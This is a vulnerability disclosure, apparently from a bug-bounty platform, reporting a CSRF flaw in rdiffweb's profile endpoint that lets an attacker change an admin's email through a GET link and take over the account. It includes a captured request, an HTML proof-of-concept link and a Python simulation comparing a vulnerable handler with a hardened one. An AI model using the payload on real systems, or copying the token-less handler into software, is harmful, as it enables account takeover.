CSRF resulting in Account Takeover in ikus060/rdiffweb

Valid

Reported on

Sep 14th 2022


Description

Hello everyone,

Rdiffweb offers a profile section where the admin user can change his information, such as the username, the email, etc. When the admin changes his username and his email, the following POST request is sent:

POST /prefs/general HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
Cookie: session_id=27c2d6767e8f524663f44191d0a0cf9bac2d45c7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: https://rdiffweb-demo.ikus-soft.com
Referer: https://rdiffweb-demo.ikus-soft.com/prefs/general
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

username=admin&email=test%40admin.net&action=set_profile_info

The above POST request isn't protected by an anti-CSRF token to prevent CSRF attacks, as the software takes a different approach, which is setting the SameSite flag to Lax. This is somewhat helpful, but the above request can also be sent using the GET verb, so the Lax attribute won't work in this case; an attacker would host an HTML page containing an a tag that initiates a request to the vulnerable endpoint once it's clicked!

Proof of Concept

<html>
  <body>
    <a href="https://rdiffweb-demo.ikus-soft.com/prefs/general?username=admin&email=test%40admin.net&action=set_profile_info">Click Here !</a>
  </body>
</html>

Impact

The CSRF targets a critical function (email changing), so this could result in an Account Takeover.
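The attack described in the report, as an added example that is not rdiffweb's own code: a small Python model of the browser's SameSite cookie rules beside a handler that, like the reported endpoint, accepts the same parameters over GET and POST with no token, and a hardened version that requires POST, checks fetch metadata and verifies a per-session token. The handler names, the in-memory session store and the victim and attacker values are constructed for this example; the only behaviour taken from the report is that the endpoint honours GET and that the session cookie is SameSite=Lax.

```python
# Added example (not rdiffweb's own code). Assumptions: the handler sees query-string and
# form parameters merged into one dict (as CherryPy exposes them) and the session cookie
# is SameSite=Lax, as the report states. Names and values below are constructed.
from dataclasses import dataclass, field
import hmac
import secrets


@dataclass
class Request:
    method: str
    params: dict                                   # query string and form body merged
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


@dataclass
class Session:
    username: str
    email: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


SESSIONS: dict = {}                                # constructed store: session_id -> Session


def cookie_sent(samesite: str, cross_site: bool, method: str, top_level_nav: bool) -> bool:
    """Simplified model of when a browser attaches a cookie to an outgoing request."""
    if not cross_site:
        return True
    if samesite == "Strict":
        return False
    if samesite == "Lax":
        # Lax still attaches the cookie to a top-level navigation with a safe method,
        # which is exactly what clicking the attacker's <a href> produces.
        return top_level_nav and method in ("GET", "HEAD")
    return True                                    # SameSite=None


def vulnerable_set_profile(req: Request) -> str:
    """Mirrors the reported behaviour: any verb accepted, no anti-CSRF token."""
    sess = SESSIONS.get(req.cookies.get("session_id"))
    if sess is None:
        return "401"
    if req.params.get("action") != "set_profile_info":
        return "400"
    sess.username = req.params.get("username", sess.username)
    sess.email = req.params.get("email", sess.email)
    return "200"


def hardened_set_profile(req: Request) -> str:
    """State change only over POST, only from same-origin, only with the session's token."""
    sess = SESSIONS.get(req.cookies.get("session_id"))
    if sess is None:
        return "401"
    if req.method != "POST":
        return "405"
    # Sec-Fetch-Site is set by the browser; it may be absent in old browsers,
    # so it is a cheap first filter and the token below remains mandatory.
    if req.headers.get("Sec-Fetch-Site") not in (None, "same-origin", "none"):
        return "403"
    if not hmac.compare_digest(req.params.get("csrf_token", ""), sess.csrf_token):
        return "403"
    if req.params.get("action") != "set_profile_info":
        return "400"
    sess.username = req.params.get("username", sess.username)
    sess.email = req.params.get("email", sess.email)
    return "200"


def simulate(handler, method: str, top_level_nav: bool, cross_site: bool = True,
             samesite: str = "Lax", new_email: str = "attacker@evil.example") -> tuple:
    """Log a constructed admin in, replay the profile-change request, return (status, email after)."""
    sid = secrets.token_hex(20)
    sess = Session(username="admin", email="admin@example.org")
    SESSIONS[sid] = sess
    params = {"username": "admin", "email": new_email, "action": "set_profile_info"}
    headers = {"Sec-Fetch-Site": "cross-site" if cross_site else "same-origin"}
    if not cross_site:
        params["csrf_token"] = sess.csrf_token    # the legitimate form carries the token
    cookies = {"session_id": sid} if cookie_sent(samesite, cross_site, method, top_level_nav) else {}
    status = handler(Request(method, params, headers, cookies))
    return status, SESSIONS.pop(sid).email


if __name__ == "__main__":
    print("link click, vulnerable:", simulate(vulnerable_set_profile, "GET", True))
    print("form post, vulnerable: ", simulate(vulnerable_set_profile, "POST", True))
    print("link click, hardened:  ", simulate(hardened_set_profile, "GET", True))
    print("own form, hardened:    ", simulate(hardened_set_profile, "POST", True, cross_site=False))
```

Running the block shows the point of the report: against the vulnerable handler a cross-site POST fails because Lax withholds the cookie, but the top-level GET from the attacker's link carries it and changes the email. The hardened handler refuses the GET outright, and a cross-site POST would still fail on the fetch-metadata check or the token even if the cookie were SameSite=None.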

ikus060/rdiffweb maintainer has acknowledged this report
Patrik Dufresne validated this vulnerability

Your vulnerability report is valid.

Moad Akhraz has been awarded the disclosure bounty
Patrik Dufresne confirmed that a fix has been merged on f10ead
Patrik Dufresne has been awarded the fix bounty